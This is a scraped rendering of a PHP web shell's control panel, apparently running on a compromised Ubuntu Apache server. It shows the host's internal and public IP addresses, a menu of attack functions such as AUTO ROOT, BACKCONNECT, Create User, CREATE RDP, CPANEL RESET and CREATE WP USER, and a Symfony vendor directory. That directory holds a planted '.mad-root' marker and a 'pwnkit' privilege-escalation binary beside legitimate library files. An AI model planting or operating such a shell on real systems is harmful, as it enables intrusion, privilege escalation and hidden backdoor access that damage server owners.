Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.217.210.224
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
vendor /
symfony /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
Definition
[ DIR ]
drwxrwxr-x
Exception
[ DIR ]
drwxrwxr-x
Loader
[ DIR ]
drwxrwxr-x
Resource
[ DIR ]
drwxrwxr-x
Util
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
CHANGELOG.md
4.06
KB
-rw-rw-r--
ConfigCache.php
1.55
KB
-rw-rw-r--
ConfigCacheFactory.php
1.08
KB
-rw-rw-r--
ConfigCacheFactoryInterface.ph...
977
B
-rw-rw-r--
ConfigCacheInterface.php
1.3
KB
-rw-rw-r--
FileLocator.php
2.48
KB
-rw-rw-r--
FileLocatorInterface.php
1.03
KB
-rw-rw-r--
LICENSE
1.04
KB
-rw-rw-r--
README.md
601
B
-rw-rw-r--
ResourceCheckerConfigCache.php
5.53
KB
-rw-rw-r--
ResourceCheckerConfigCacheFact...
1.04
KB
-rw-rw-r--
ResourceCheckerInterface.php
1.35
KB
-rw-rw-r--
composer.json
1.25
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ConfigCacheInterface.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config; use Symfony\Component\Config\Resource\ResourceInterface; /** * Interface for ConfigCache. * * @author Matthias Pigulla <mp@webfactory.de> */ interface ConfigCacheInterface { /** * Gets the cache file path. * * @return string The cache file path */ public function getPath(); /** * Checks if the cache is still fresh. * * This check should take the metadata passed to the write() method into consideration. * * @return bool Whether the cache is still fresh */ public function isFresh(); /** * Writes the given content into the cache file. Metadata will be stored * independently and can be used to check cache freshness at a later time. * * @param string $content The content to write into the cache * @param ResourceInterface[]|null $metadata An array of ResourceInterface instances * * @throws \RuntimeException When the cache file cannot be written */ public function write(string $content, array $metadata = null); }
Close